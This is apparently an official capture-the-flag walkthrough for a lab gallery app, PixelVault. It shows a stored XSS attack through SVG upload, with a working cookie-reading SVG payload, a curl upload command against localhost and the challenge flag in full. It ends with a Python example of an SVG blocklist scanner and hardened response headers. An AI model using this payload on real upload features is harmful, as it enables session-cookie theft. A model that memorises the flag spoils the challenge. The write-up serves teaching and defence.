HACKR.GG
hackr.gg — Official Walkthrough
Confidential · Educational Use Only

PixelVault

File Upload Security · Stored XSS via SVG Upload (Same-Origin Script Execution)
Difficulty: Easy
Vuln class: Stored XSS via SVG Upload (Same-Origin Script Execution)
Steps: 4
// Objective
Upload a malicious SVG file containing a script tag that executes when the file is viewed directly, stealing the gallery_session cookie.
// Tools required
curl, Browser
// Step-by-step walkthrough
1. Create a malicious SVG
SVG is XML. XML can contain script elements. Write an SVG file with a script that reads document.cookie.
Command / Input
cat > /tmp/evil.svg << 'EOF'
<?xml version="1.0" encoding="UTF-8"?>
<svg xmlns="http://www.w3.org/2000/svg">
<script>alert(document.cookie)</script>
<rect width="100" height="100" fill="red"/>
</svg>
EOF
2. Upload the SVG
Upload evil.svg through the gallery form in the browser, or with curl.
Command / Input
curl -s -F 'image=@/tmp/evil.svg;type=image/svg+xml' http://localhost:$PORT/upload
The server checks the file extension (.svg is in the allowlist) but does not strip script content.
3. Open the uploaded SVG directly
In the browser, click the SVG thumbnail. This navigates directly to /uploads/ID. The server responds with Content-Type: image/svg+xml on the same origin — the browser parses it as XML and executes the script.
Output
Alert popup showing the gallery_session cookie with the flag.
This only works because the file is served from the same origin. If it were on a CDN subdomain, same-origin policy would block cookie access.
4. Read the flag
The flag is in the gallery_session cookie value shown in the alert popup.
Output
HackrGG{svg_1s_xml_xss_byp4ss3d_upl04d}
// Flag
Flag value: HackrGG{svg_1s_xml_xss_byp4ss3d_upl04d}
In the gallery_session cookie — revealed when your SVG script executes on the same origin.
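
// Defensive counterpart (added example)
Added here as an example, not PixelVault's own code: the check missing in step 2 (look inside the SVG instead of at its extension) and response headers for /uploads/ID that address step 3 (a missed payload must not run in the gallery's origin). Function names and the header set are assumptions; the element and attribute list is a blocklist and is not exhaustive.

```python
import xml.etree.ElementTree as ET

# Elements that make an SVG "active" (a blocklist, so not exhaustive).
ACTIVE_ELEMENTS = {"script", "foreignobject", "iframe", "object", "embed"}

# The SVG from step 1 of the walkthrough, plus a constructed benign file.
PAGE_SVG = b"""<?xml version="1.0" encoding="UTF-8"?>
<svg xmlns="http://www.w3.org/2000/svg">
<script>alert(document.cookie)</script>
<rect width="100" height="100" fill="red"/>
</svg>"""
BENIGN_SVG = b'<svg xmlns="http://www.w3.org/2000/svg"><rect width="9" height="9"/></svg>'

def local(name: str) -> str:
    """Strip the '{namespace}' prefix ElementTree puts on tag/attribute names."""
    return name.rsplit("}", 1)[-1].lower()

def svg_findings(data: bytes) -> list[str]:
    """Return reasons to reject the upload; an empty list means none were found."""
    lowered = data.lower()
    if b"<!doctype" in lowered or b"<!entity" in lowered:
        return ["DOCTYPE/ENTITY declaration"]  # refuse before any entity is parsed
    try:
        root = ET.fromstring(data)
    except ET.ParseError:
        return ["not well-formed XML"]
    findings = []
    for el in root.iter():
        tag = local(el.tag)
        if tag in ACTIVE_ELEMENTS:
            findings.append(f"<{tag}> element")
        for name, value in el.attrib.items():
            attr = local(name)
            if attr.startswith("on"):
                findings.append(f"{attr} handler on <{tag}>")
            elif attr == "href" and value.strip().lower().startswith("javascript:"):
                findings.append(f"javascript: URL on <{tag}>")
    return findings

def upload_response_headers() -> dict[str, str]:
    """Headers for /uploads/ID so a missed payload cannot run with the site's cookies."""
    return {
        "X-Content-Type-Options": "nosniff",
        # 'sandbox' disables script and gives the document an opaque origin.
        "Content-Security-Policy": "default-src 'none'; style-src 'unsafe-inline'; sandbox",
        "Content-Disposition": "attachment",  # direct navigation downloads, not renders
    }
```

An allowlist sanitizer or re-encoding to a raster format is stronger than this blocklist; the headers are what still hold when the scan misses something.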